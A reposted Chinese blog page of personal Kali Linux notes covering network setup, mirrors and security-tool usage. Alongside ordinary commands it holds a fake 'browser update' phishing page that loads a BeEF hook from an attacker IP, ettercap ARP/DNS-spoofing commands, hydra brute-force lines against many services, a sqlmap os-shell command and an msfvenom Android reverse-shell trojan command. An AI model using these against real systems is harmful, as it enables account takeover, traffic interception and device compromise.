Linux命令整理-Kali
2024-05-30 20:33:57
网络相关
桥接模式下无法联网:设置桥接网卡地址为指定网卡(如dual band)
1 route -n 查看网关/子网掩码 2 虚拟机中屏幕太小-设置中调节分辨率 3 DNS配置:cat /etc/resolv.conf 4 网卡设置:cat /etc/network/interfaces 5 重启网络服务:service networking restart
View Code
源相关
apt-get update && apt-get upgrade && apt-get dist-upgrade
1 系统源文件 vi /etc/apt/sources.list 2 中科大源: 3 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 4 deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 5 deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free 6 deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free
View Code
工具安装
Vmware Tools: 1 cp /media/cdrom/VMwareTools-10.2.0-7259539.tar.gz . 2 tar xf VMwareTools-10.2.0-7259539.tar.gz 3 vmware-tools-distrib/vmware-install.pl 4 重启虚拟机Sublist3r 下载 git clone https://github.com/aboul3la/Sublist3r.git 安装相应的模块 sudo pip install -r requirements.txt sudo apt-get install python-requests sudo apt-get install python-dnspython sudo apt-get install python-argparse 参数: -d 域名(domain) -b 暴力破解(bruteforce) -p 指定端口(ports) -v 显示详细信息(verbose) -t 线程数(threads) -e 指定搜索引擎(engines) -o 输出(output) -h 显示帮助信息(help)使用示例: sudo ./sublist3r.py -d xx.com -t 10 -o xx.com
beef-xss
1 安装路径 cd /usr/share/beef-xss/
2 启动 ./beef
3 配置文件 config.yaml
4 通过服务开启/关闭
5 systemctl start beef-xss.service
6 systemctl stop beef-xss.service
7 systemctl restart beef-xss.service
8 默认账号 beef/beef
9 后台路径 /ui/authentication
10 默认端口 3000
11 Hook链接 "<html>
12 <head>
13 <script src=""10.18.100.54:3000/hook.js""></script>
14 <title>浏览器更新</title>
15 <style>
16 #fsd{17 color:blue;
18 text-align:center;
19 font-family:30px;
20 }
21 </style>
22 </head>
23 <body>
24 <div id=""fsd"">
25 <h3>您的浏览器版本过低,请及时更新!</h3>
26 <h3>如若您不更新可能会影响到您的浏览,导致一些功能无法正常使用</h3>
27 <h3>浏览器更新:</h3>
28 <a href=""""360安全浏览器.exe"">点我下载最新版本浏览器</a>
29 </div>
30 </body>
31 </html>" View Code
ettercap(基于arp欺骗)
1 版本 ettercap -v 2 图形化界面 ettercap -G 3 Unified sniffing 嗅探所有 4 Hosts->host list 查看嗅探结果(ip/mac) 5 中间人攻击方法 6 ARP欺骗 7 icmp 重定向 8 port stealing 9 DHCP 欺骗 10 NDP poisoning 11 配置文件 /etc/ettercap/etter.dns 12 DNS欺骗 ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2//
View Code
hydra
1 mssql 2 hydra.exe -l sa -P c:\pass.txt 192.168.1.110 mssql 3 mysql 4 hydra.exe -L c:\user.txt -P c:\pass.txt 192.168.1.110 mysql 5 FTP 6 hydra.exe -l admin -P c:\pass.txt -t 5 192.168.1.110 ftp 7 ssh 8 hydra.exe -L users.txt -P password.txt -e n -t 5 -vV 192.168.1.110 ssh 9 rdp 10 hydra.exe -l administrator -P c:\pass.txt www.xxser.com rdp -V 11 pop3 12 hydra.exe -l root -P pass.txt my.pop3.mail pop3 13 sqlmap.py -d "mssql://sa:pwd@123@192.168.1.110:1433/master" --os-shell sqlmap通过密码提权 14 Post登录 15 hydra -l admin -P pwd.txt -v IP http-post-form "/:username=^USER^&password=^PASS^&this_is_the=data&next=:<title>| Django site admin</title>"
View Code
Koadic(后渗透工具)
1 非自带,需要安装: 2 git clone https://github.com/zerosum0x0/koadic.git 3 cd koadic/ 4 pip install -r requirements.txt 5 运行:./koadic
View Code
wafw00f
1 支持防火墙识别(120种): 2 aeSecure (aeSecure) 3 Airlock (Phion/Ergon) 4 Alert Logic (Alert Logic) 5 AliYunDun (Alibaba Cloud Computing) 6 Anquanbao (Anquanbao) 7 AnYu (AnYu Technologies) 8 Approach (Approach) 9 Armor Defense (Armor) 10 ASP.NET Generic Protection (Microsoft) 11 Astra Web Protection (Czar Securities) 12 AWS Elastic Load Balancer (Amazon) 13 Yunjiasu (Baidu Cloud Computing) 14 Barikode (Ethic Ninja) 15 Barracuda Application Firewall (Barracuda Networks) 16 Bekchy (Faydata Technologies Inc.) 17 BinarySec (BinarySec) 18 BitNinja (BitNinja) 19 BlockDoS (BlockDoS) 20 Bluedon (Bluedon IST) 21 CacheWall (Varnish) 22 CdnNS Application Gateway (CdnNs/WdidcNet) 23 WP Cerber Security (Cerber Tech) 24 ChinaCache CDN Load Balancer (ChinaCache) 25 Chuang Yu Shield (Yunaq) 26 ACE XML Gateway (Cisco) 27 Cloudbric (Penta Security) 28 Cloudflare (Cloudflare Inc.) 29 Cloudfront (Amazon) 30 Comodo cWatch (Comodo CyberSecurity) 31 CrawlProtect (Jean-Denis Brun) 32 DenyALL (Rohde & Schwarz CyberSecurity) 33 Distil (Distil Networks) 34 DOSarrest (DOSarrest Internet Security) 35 DotDefender (Applicure Technologies) 36 DynamicWeb Injection Check (DynamicWeb) 37 Edgecast (Verizon Digital Media) 38 Expression Engine (EllisLab) 39 BIG-IP Access Policy Manager (F5 Networks) 40 BIG-IP Application Security Manager (F5 Networks) 41 BIG-IP Local Traffic Manager (F5 Networks) 42 FirePass (F5 Networks) 43 Trafficshield (F5 Networks) 44 FortiWeb (Fortinet) 45 GoDaddy Website Protection (GoDaddy) 46 Greywizard (Grey Wizard) 47 HyperGuard (Art of Defense) 48 DataPower (IBM) 49 Imunify360 (CloudLinux) 50 Incapsula (Imperva Inc.) 51 Instart DX (Instart Logic) 52 ISA Server (Microsoft) 53 Janusec Application Gateway (Janusec) 54 Jiasule (Jiasule) 55 KS-WAF (KnownSec) 56 Kona Site Defender (Akamai) 57 LiteSpeed Firewall (LiteSpeed Technologies) 58 Malcare (Inactiv) 59 Mission Control Application Shield (Mission Control) 60 ModSecurity (SpiderLabs) 61 NAXSI (NBS Systems) 62 Nemesida (PentestIt) 63 NetContinuum (Barracuda Networks) 64 NetScaler AppFirewall (Citrix Systems) 65 NevisProxy (AdNovum) 66 Newdefend (NewDefend) 67 NexusGuard Firewall (NexusGuard) 68 NinjaFirewall (NinTechNet) 69 NSFocus (NSFocus Global Inc.) 70 OnMessage Shield (BlackBaud) 71 Open-Resty Lua Nginx WAF 72 Palo Alto Next Gen Firewall (Palo Alto Networks) 73 PerimeterX (PerimeterX) 74 pkSecurity Intrusion Detection System 75 PowerCDN (PowerCDN) 76 Profense (ArmorLogic) 77 AppWall (Radware) 78 Reblaze (Reblaze) 79 RSFirewall (RSJoomla!) 80 ASP.NET RequestValidationMode (Microsoft) 81 Sabre Firewall (Sabre) 82 Safe3 Web Firewall (Safe3) 83 Safedog (SafeDog) 84 Safeline (Chaitin Tech.) 85 SecuPress WordPress Security (SecuPress) 86 Secure Entry (United Security Providers) 87 eEye SecureIIS (BeyondTrust) 88 SecureSphere (Imperva Inc.) 89 SEnginx (Neusoft) 90 Shield Security (One Dollar Plugin) 91 SiteGround (SiteGround) 92 SiteGuard (Sakura Inc.) 93 Sitelock (TrueShield) 94 SonicWall (Dell) 95 UTM Web Protection (Sophos) 96 Squarespace (Squarespace) 97 StackPath (StackPath) 98 Sucuri CloudProxy (Sucuri Inc.) 99 Tencent Cloud Firewall (Tencent Technologies) 100 Teros (Citrix Systems) 101 TransIP Web Firewall (TransIP) 102 URLMaster SecurityCheck (iFinity/DotNetNuke) 103 URLScan (Microsoft) 104 Varnish (OWASP) 105 VirusDie (VirusDie LLC) 106 Wallarm (Wallarm Inc.) 107 WatchGuard (WatchGuard Technologies) 108 WebARX (WebARX Security Solutions) 109 WebKnight (AQTRONIX) 110 WebSEAL (IBM) 111 WebTotem (WebTotem) 112 West263 Content Delivery Network 113 Wordfence (Feedjit) 114 WTS-WAF (WTS) 115 360WangZhanBao (360 Technologies) 116 XLabs Security WAF (XLabs) 117 Xuanwudun 118 Yundun (Yundun) 119 Yunsuo (Yunsuo) 120 Zenedge (Zenedge) 121 ZScaler (Accenture)
View Code
Cobalt Strike(MSF升级版)
Python相关
1 pip默认安装Python2相关包故如需Python3环境需要重新配置pip3 2 安装Python3.7 3 wget https://www.python.org/ftp/python/3.7.0/Python-3.7.0.tgz 4 tar -zxvf Python-3.7.0.tgz 5 apt-get install -y make build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev xz-utils tk-dev 6 ./configure --enable-optimizations --prefix=/usr/local/Python-3.7/ && make && make install 7 ln -s -b /usr/local/python3.7/bin/python3.7 /usr/bin/python 8 ln -s -b /usr/local/python3.7/bin/pip3 /usr/bin/pip3
View Code
文件处理
打包 zip -r -q -o test.zip /home/test
木马相关
安卓木马生成 - msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
数据库相关
postgresql 开启root@kali:~# service postgresql start
用户/域相关
修改用户所在组 usermod -g group loginname
文件处理
文件压缩/解压缩tar命令 压缩 tar -cvf log.tar log2012.log 仅打包,不压缩! tar -zcvf log.tar.gz log2012.log 打包后,以 gzip 压缩 tar -jcvf log.tar.bz2 log2012.log 打包后,以 bzip2 压缩 解压缩 tar -xzvf test.tar.gz
问题处理
find: ‘/run/user/131/gvfs’: 权限不够 的解决办法mount /run/user/131/gvfs // 卸载该文件rm -rf /run/user/131/gvfs // 删除该文件
转载于:https://www.cnblogs.com/AtesetEnginner/p/11194055.html
Linux命令整理-Kali相关推荐
- Linux命令整理(二)
Linux命令整理(二) 文章目录 Linux命令整理(二) 8.正则表达式与文件格式化处理 8.1.基础正则表达式 8.2.grep 的一些进阶选项 8.3.sed 工具 8.4.延伸的正则表达式 ...
- Linux 命令整理(一)
Linux 命令整理(一) 文章目录 Linux 命令整理(一) 1.认识 Linux 1.1.CentOS 的观察 1.2.X window 与文本模式的切换 1.3.正确开关机 2.文件与目录权限 ...
- Linux 命令整理
命令参考: 1.<鸟哥的linux私房菜> 2.<Linux命令行大全> 3.<循序渐进Linux第2版> 4.老男孩Linux 5.马哥教育 6.http://c ...
- 开发必备的常用 Linux 命令整理
在前面的文章中,截止到 微服务系列:分布式日志 ELK 搭建指南 这篇,我们终于算是将微服务系列给基本学完了,一时间难以决定接下来要写些什么东西. 想了想还是决定写几篇 Linux 相关命令的文章,毕 ...
- 日志处理--高效Linux命令整理
序 在学习使用python处理日志开始阶段,对我阻力最大的莫过于对linux的不熟悉了,有种寸步难行的感觉. 在之后乱学一通之后,发现有点对我颇有益处: 学<鸟哥linux私房菜基础学习篇> ...
- 常见Linux命令整理
linux 常用命令--------雪松整理 Q 群: 198173206 欢迎 linux 系统运维朋友加入! 博客: http://hi.baidu.com/quanzhou722/blog 错误 ...
- sle linux lftp禁止匿名登陆_软件测试常用linux命令整理
作为一个名软件测试工程师,掌握Linux的基本操作是必须的.下面罗列下linux的常用命令,方便大家今后操作linux时查找,然后通过[帮助命令]进行具体的使用. 1.帮助命令man -- man ...
- Linux命令整理 —— vi 和 vim 编辑器
一.目录结构 二 .vim 和 vim 编辑器 2.1[基本介绍] 所有的 Linux 系统都会内建 vi 文本编辑器. vim 具有程序编辑的能力,可以看做是 vi 的增强版本,可以主动的以字体颜色 ...
- Linux命令整理 —— 目录结构
二 .vi 和 vim 编辑器 [写在前面] 云计算与分布式这门课程的实验都是在Linux下完成的,虽然之前也一直也学习过Linux,但是一直没有系统的过一遍.这周花了两天的时间看完了尚硅谷的Linu ...
- 尘缘浅悟之蹒跚学步:linux命令整理
前言 多记.多练.多理解 目录 一.切换命令 二.查看命令 三.开启命令 四.关闭命令 五.修改命令 六.增加命令 七.删除命令 八.帮助命令 九.vi常用命令 十.查找命令 十一.拷贝命令 十二.移 ...
最新文章
- Unable to find remote helper for 'https'解决办法
- 天天生鲜的用户登录机制和redis的作用
- 一些用过的优秀软件摘录
- nginx-配置基于ip或域名的虚拟主机
- WINCE6.0 DM.EXE 激活驱动失败的原因之一
- C语言工厂方法模式,工厂函数模式 (C语言实现)
- 华为云技术开放日(第三季)活动报道
- 测试:fiddler使用
- MySQL -- binlog 操作与恢复
- Oracle索引状态查询与索引重建
- Aliyun Linux2安装Docker
- 有哪些 pmp 资料分享?
- 乐优商城第九天,第十天,(商品规格参数模版的新增,商品的新增)
- 【雕爷学编程】Arduino动手做(59)---RS232转TTL串口模块
- MPU6050初始化失败原因及常见问题解决方法
- 2021 年职业院校技能大赛“网络安全”项目 江西省比赛任务书
- 阿里云centOS 将不带www的域名301重定向到带www域名
- 万里挑一!热门机器学习开源资源最强盘点
- 4个小方法,让你的抖音发出来的视频更清楚
- 布莱克斯科尔斯模型(一)